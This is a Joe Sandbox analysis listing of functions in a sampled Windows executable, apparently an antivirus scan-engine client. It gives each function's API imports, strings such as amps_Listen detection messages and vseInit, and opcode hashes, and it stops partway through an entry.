UnhandledExceptionFilter.KERNEL32 ref: 0000000140010740

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContext
String ID:
API String ID: 2202868296-0
Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01

Function 00007FFE1A51A1B8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

Rcl^i, xrefs: 00007FFE1A51A356

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID:
String ID: Rcl^i
API String ID: 0-2241636769
Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction ID: e9e63e4b960bd7cfcb34c2f37e5de1f20d0a3ececb1af84c9e184d25eec958d8
Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction Fuzzy Hash: 9D51F862B0CB8185FB109B73A8405BA7BA2BB41BA4F1441B6EF5C67AA9DF3CD401C700

Function 00007FFE1A520248 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FFE1A520497
RaiseException.KERNEL32 ref: 00007FFE1A5204A8

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction ID: 1b2b05230377b3175670e92c5f414f6eb15caa164b20ce4f2f35e47aa6c98fab
Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction Fuzzy Hash: 4BB12873605B89CBEB15CF6AC48636C37A2F745F68F1489A2DA5D837A4CB39D851C700

Function 00000001400103D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00000001400105C2
GetLastError.KERNEL32 ref: 00000001400105ED

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10

Function 0000000140010CF0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300

Function 0000000140011270 Relevance: 1.6, APIs: 1, Instructions: 84COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: EntryFunctionLookup
String ID:
API String ID: 3852435196-0
Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704

Function 000000014000DDD9 Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

, xrefs: 000000014000E388

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40

Function 000000014000F370 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 000000014000F398

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00

Function 000000014000E178 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00

Function 000000014000DFFE Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40

Function 00000001400092E0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00000001400092EB

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700

Function 000000014000DEFB Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40

Function 000000014000DDFF Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40

Function 000000014000DE96 Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40

Function 000000014000CC00 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704

Function 000000014000C2A0 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710

Function 00000001400110F0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700

Function 00007FFE1A51FD40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction ID: 59fa7d81a14b79a0ce93f6df39f42e77e019aba0d44b0c8d5ec2b45d14124a3f
Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction Fuzzy Hash: 4AF0C8B171C6518ADB958F69E402A393BD1E7487D0F8480BFD58C83B14C63C90509F04

Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWaitableTimer.KERNEL32 ref: 000000014000390C
#4.VSELOG ref: 000000014000395D
#4.VSELOG ref: 000000014000398D
EnterCriticalSection.KERNEL32 ref: 0000000140003996
LeaveCriticalSection.KERNEL32 ref: 00000001400039A7
WaitForMultipleObjects.KERNEL32 ref: 00000001400039CB
#4.VSELOG ref: 0000000140003A04
EnterCriticalSection.KERNEL32 ref: 0000000140003A0D
SetEvent.KERNEL32 ref: 0000000140003A52
ResetEvent.KERNEL32 ref: 0000000140003A5F
LeaveCriticalSection.KERNEL32 ref: 0000000140003A70
#4.VSELOG ref: 0000000140003AA1
#4.VSELOG ref: 0000000140003AD5

Strings

amps_Listen: pHandle=%p, message received, pulling from AMP queue, xrefs: 00000001400039F3
amps_Listen: pHandle=%pdetection component type: %d, xrefs: 0000000140003C93
amps_Listen: pHandle=%p, waiting for messages from the AMP queue, xrefs: 000000014000397C
amps_Listen: pHandle=%pobject archive name: %s, xrefs: 0000000140003B74
amps_Listen: pHandle=%pdetection accuracy: %d, xrefs: 0000000140003C2B
amps_Listen: pHandle=%psession Id: %d, xrefs: 0000000140003CFB
amps_Listen: pHandle=%pdetection type: %d, xrefs: 0000000140003C5F
amps_Listen: pHandle=%p, message is:, xrefs: 0000000140003A90
amps_Listen: pHandle=%peventId: %d, xrefs: 0000000140003AC4
amps_Listen: pHandle=%p, p=%p, xrefs: 0000000140003949
amps_Listen: pHandle=%paction taken: %d, xrefs: 0000000140003CC7
null, xrefs: 0000000140003AEF
amps_Listen: pHandle=%pdetection message: %s, xrefs: 0000000140003BED
amps_Listen: pHandle=%pobject type: %d, xrefs: 0000000140003B3D
amps_Listen: pHandle=%pdetection name: %s, xrefs: 0000000140003BB2
amps_Listen: pHandle=%pobject name: %s, xrefs: 0000000140003B02

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
API String ID: 1021822269-3147033232
Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32 ref: 0000000140001054
GetProcAddress.KERNEL32 ref: 000000014000106C
FreeLibrary.KERNEL32 ref: 000000014000108F
GetProcAddress.KERNEL32 ref: 00000001400010D2
GetProcAddress.KERNEL32 ref: 00000001400010ED
GetProcAddress.KERNEL32 ref: 0000000140001108
GetProcAddress.KERNEL32 ref: 0000000140001123
GetProcAddress.KERNEL32 ref: 000000014000113E
GetProcAddress.KERNEL32 ref: 0000000140001159
GetProcAddress.KERNEL32 ref: 0000000140001174
FreeLibrary.KERNEL32 ref: 0000000140001194
InitializeCriticalSection.KERNEL32 ref: 00000001400011BE

Strings

vseSet, xrefs: 0000000140001166
vseInit, xrefs: 00000001400010FA
vseRelease, xrefs: 0000000140001115
vseExec, xrefs: 0000000140001130
{7A7E8119-620E-4CEF-BD5F-F748D7B059DA}, xrefs: 0000000140001081
vseGlobalRelease, xrefs: 00000001400010DF
MsiLocateComponentW, xrefs: 0000000140001062
msi.dll, xrefs: 0000000140001042
vseGet, xrefs: 000000014000114B
vseGlobalInit, xrefs: 00000001400010C8

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
API String ID: 883923345-381368982
Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700

Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

